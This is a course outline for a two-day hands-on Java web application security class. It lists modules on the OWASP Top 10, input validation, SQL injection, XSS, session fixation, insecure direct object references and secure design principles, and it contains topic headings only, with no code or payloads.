Summary
 Summary:
This 2 day course will provides the students with the necessary knowledge on how to build, design and test the security of web applications. The course explains the vulnerability, provides samples of the flaw and provides solutions to protect the web application against common vulnerabilities.
This course involves hands-on demonstrations and labs. All java developers that developing Web application should be familiar with those vulnerabilities and know how to write defensive code. Right now many web application do not have defence against hacking. This class will teach how to write defensive code to prevent hacking.
This is a hands-on course that introduces the concepts and challenges students to:
• Make reasoned choices and implement secure code. All examples for implementing secure code are based on OWASP ESAPI library.
Intended Audience
• Intermediate Java Developers
Pre-requisite Knowledge
• Experience developing J2EE applications
Learning Objectives
• Foundation of Application Security and common attack patterns against applications including OWASP Top 10 for 2010
• Understanding of various defensive development strategies to protect applications against common attack patterns including OWASP Top 10
Module 1: Introduction
• Latest News
• Hackers Evolution
• What is Application Security & Why It Matters?
• Introduction to OWASP Top 10
• What is the OWASP Top 10 and ESAPI?
• Overview OF OWASP
• Injection
• Cross-Site Scripting (XSS)
• Broken Authentication and Session Management
• Insecure Direct Object References
• Cross-Site Request Forgery (CSRF)
• Security Misconfiguration
• Insecure Cryptographic Storage
• Failure to Restrict URL Access
• Insufficient Transport Layer Protection
• Invalidated Redirects and Forwards
• What is Information Security?
• Security Principles
• Layered Security
• Segmentation
• Technical Controls
• Error Handling
• Application Security Architecture
Module 2: Input And Output Validation
• Concepts
• Canonicalization
• Data Validation
• Data Validation: Exact Match
• Data Validation: Known Good
• Data Validation: Example
• Data Validation: Reject Known Bad
• Client Side Controls
• Business Logic Validation
• Design Guidelines
• Design Patterns
Module 3: SQL Injection
• Introduction
• Example Walkthrough
• Exploitability. Prevalence, Detectability and Impacts
• Time of Introduction and Application Platforms
• Prevention Techniques
• Prepared Statements
• Example
• Example: Bad Implementation
• Stored Procedures
• Example
• ORM Frameworks
• Hibernate Examples
• Escaping User Input
• Numeric SQL Injection
• Example
• Rule of least Privelege
Module 4 : Cross Site Scripting (XSS)
• Stored XSS
• Reflective XSS
• Examples
• Exploitability, Prevalence, Detectability and Impacts
• Time of Introduction and Application Platforms
• Prevention Techniques
• Prevention Techniques: OWASP XSS Rules
• Standard Escaping Implementations
• Examples
Module 5 : Broken Authentication and Session Management
• Introduction
• Session Fixation
• Session Fixation Demo
• Session Fixation Examples
• Attack Process
• STEP 1: Session Setup
• STEP 2: Session Fixation
• Session ID in an URL argument
• Session ID in a Hidden Form Field
• Session ID in a Cookie
• STEP 3: Session Entrance
• Session Fixation Defense
• Session Fixation vs. Session Hijacking
• Exercises
Module 6: Insecure Direct Object References
• Concepts
• Examples
• Examples
• Exploitability, Prevalence, Detectability and Impacts
• Time of Introduction and Application Platforms
• Prevention Techniques
Module 7: Secure Design Principles
• The Need For Secure Design
• Confidentiality
• Integrity
• Availability
• Authentication
• Authorization
• Auditing and Logging
• Least Privilege
• Separation of Duties
• Defense in Depth
• Fail Safe
• Economy of Mechanism
• Open Design
• Limit the Number of Entry Points to Your Application
• Do Not Reinvent the Wheel
• Do Not Reveal Too Much Information
Optional: Spring Security Framework
|
Ask your question online
Latest Tweet
